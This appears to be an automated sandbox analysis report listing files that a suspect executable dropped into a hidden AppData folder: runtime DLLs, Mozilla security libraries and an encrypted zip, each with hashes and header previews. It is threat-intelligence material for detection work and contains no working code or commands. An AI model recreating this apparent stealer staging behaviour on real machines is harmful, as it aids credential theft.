Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-filesystem-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-locale-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-math-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-multibyte-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-private-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-process-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-runtime-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-stdio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-time-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\api-ms-win-crt-utility-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\breakpadinjector.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	117712
Entropy (8bit):	6.598338256653691
Encrypted:	false
SSDEEP:	3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
MD5:	A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:	963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:	87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:	89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{7.{7.{..x+>.{..~+I.{...+%.{.x+$.{..+'.{.~+..{..z+4.{7.zA.{..~+>.{..{+6.{...6.{..y+6.{Rich7.{........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.808908775107082
Encrypted:	false
SSDEEP:	6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
MD5:	60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:	989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:	9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:	626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\iV7fW1cG3y_.zip Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ldap60.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	132048
Entropy (8bit):	6.627391684128337
Encrypted:	false
SSDEEP:	3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
MD5:	5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1:	40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ldif60.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
SSDEEP:	384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\libEGL.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
